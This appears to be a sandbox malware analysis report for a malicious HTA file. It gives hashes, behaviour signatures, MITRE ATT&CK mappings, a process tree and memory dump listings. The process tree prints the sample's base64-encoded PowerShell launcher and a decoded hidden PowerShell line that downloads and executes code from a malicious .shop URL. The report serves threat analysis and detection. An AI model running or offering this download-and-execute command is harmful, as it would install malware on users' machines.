aa845a8fb4ab38aebe6a16a2a8f80ca4467ac0991d3eef4d8a10bdf97dedb1e9

Resubmissions

07-01-2025 03:19

250107-dt8tqs1rc1 10

07-01-2025 03:10

250107-dpd4ka1pdv 10

07-01-2025 03:09

250107-dnmz3stlcp 10

07-01-2025 02:39

250107-c5hk9asmbl 10

Analysis

max time kernel
60s
max time network
62s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
07-01-2025 03:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aa845a8fb4ab38aebe6a16a2a8f80ca4467ac0991d3eef4d8a10bdf97dedb1e9.hta
Size

1.6MB
MD5

dbf37b54acb5e3b86a3dc93ec3b7dc24
SHA1

65100e3e23406a9f92880e202e4b006fd39f33d6
SHA256

aa845a8fb4ab38aebe6a16a2a8f80ca4467ac0991d3eef4d8a10bdf97dedb1e9
SHA512

0f785989935702715872e6621ecf9ad003f5d3d9eb8396a32fa5c0506f636a979e5c98c292885207124029c05c6dd88df33d2b91b028cdb5055ce9000dac7ae9
SSDEEP

24576:g/ISwmcPODvnBj3SoGDw/ISwmcPODvnBjc/ISwmcPODvnBj1/ISwmcPODvnBjf:g/IMcAYoGc/IMcAu/IMcAn/IMcAN

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://klipdiheqoe.shop/ruwkl.png

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3108 created 3328	3108	powershell.exe	52

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3108	powershell.exe
4	2036	powershell.exe
5	2036	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3108	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3108 set thread context of 2036	3108	powershell.exe	81

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3580	powershell.exe
3580	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 3580	1388	mshta.exe	77
PID 1388 wrote to memory of 3580	1388	mshta.exe	77
PID 1388 wrote to memory of 3580	1388	mshta.exe	77
PID 3580 wrote to memory of 3108	3580	powershell.exe	79
PID 3580 wrote to memory of 3108	3580	powershell.exe	79
PID 3580 wrote to memory of 3108	3580	powershell.exe	79
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81
PID 3108 wrote to memory of 2036	3108	powershell.exe	81

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3328
- C:\Windows\SysWOW64\mshta.exe
  C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\aa845a8fb4ab38aebe6a16a2a8f80ca4467ac0991d3eef4d8a10bdf97dedb1e9.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AawBsAGkAcABkAGkAaABlAHEAbwBlAC4AcwBoAG8AcAAvAHIAdQB3AGsAbAAuAHAAbgBnACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://klipdiheqoe.shop/ruwkl.png'))"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3108
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
e080d58e6387c9fd87434a502e1a902e

SHA1
ae76ce6a2a39d79226c343cfe4745d48c7c1a91a

SHA256
6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425

SHA512
6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
343aefc6551a7223afbefdd14bc7969f

SHA1
427aa82ae300c98c5b29da94a30a3ddc477af7e5

SHA256
58ccf1930e31d207228fbd7906f1bd413eb27720164a898da13b77c3bae0b5c3

SHA512
1dc63bca8f68d0465affb9e60f4b5268ae00d7b387dda2ddfdf848dec872e7dac1c8ff73bb5881e903ecb8a3d48e14c53a250c428e64c669c66ba27197968b51

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ucbejbq.ikw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3108-63-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-59-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-1363-0x0000000021DE0000-0x0000000021E34000-memory.dmp

Filesize
336KB

Download
memory/3108-1362-0x0000000007480000-0x00000000074CC000-memory.dmp

Filesize
304KB

Download
memory/3108-1361-0x0000000021D20000-0x0000000021DA0000-memory.dmp

Filesize
512KB

Download
memory/3108-1360-0x0000000021CA0000-0x0000000021D24000-memory.dmp

Filesize
528KB

Download
memory/3108-93-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-42-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-43-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-65-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-45-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-47-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-49-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-51-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-53-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-32-0x0000000005730000-0x0000000005A87000-memory.dmp

Filesize
3.3MB

Download
memory/3108-61-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-37-0x00000000074F0000-0x0000000007B6A000-memory.dmp

Filesize
6.5MB

Download
memory/3108-39-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/3108-91-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-41-0x0000000021B70000-0x0000000021C9A000-memory.dmp

Filesize
1.2MB

Download
memory/3108-57-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-55-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-89-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-99-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-103-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-101-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-97-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-95-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-67-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-40-0x0000000007090000-0x00000000071C4000-memory.dmp

Filesize
1.2MB

Download
memory/3108-87-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-85-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-83-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-81-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-79-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-77-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-75-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-73-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-71-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3108-69-0x0000000021B70000-0x0000000021C93000-memory.dmp

Filesize
1.1MB

Download
memory/3580-4-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/3580-19-0x0000000006C70000-0x0000000006D06000-memory.dmp

Filesize
600KB

Download
memory/3580-1-0x0000000002630000-0x0000000002666000-memory.dmp

Filesize
216KB

Download
memory/3580-20-0x0000000005FF0000-0x000000000600A000-memory.dmp

Filesize
104KB

Download
memory/3580-16-0x0000000005600000-0x0000000005957000-memory.dmp

Filesize
3.3MB

Download
memory/3580-26-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/3580-21-0x0000000006040000-0x0000000006062000-memory.dmp

Filesize
136KB

Download
memory/3580-0-0x000000007497E000-0x000000007497F000-memory.dmp

Filesize
4KB

Download
memory/3580-2-0x0000000004D20000-0x000000000534A000-memory.dmp

Filesize
6.2MB

Download
memory/3580-22-0x00000000072C0000-0x0000000007866000-memory.dmp

Filesize
5.6MB

Download
memory/3580-18-0x0000000005AE0000-0x0000000005B2C000-memory.dmp

Filesize
304KB

Download
memory/3580-17-0x0000000005AB0000-0x0000000005ACE000-memory.dmp

Filesize
120KB

Download
memory/3580-3-0x0000000074970000-0x0000000075121000-memory.dmp

Filesize
7.7MB

Download
memory/3580-6-0x0000000005520000-0x0000000005586000-memory.dmp

Filesize
408KB

Download
memory/3580-7-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/3580-5-0x0000000005380000-0x00000000053A2000-memory.dmp

Filesize
136KB

Download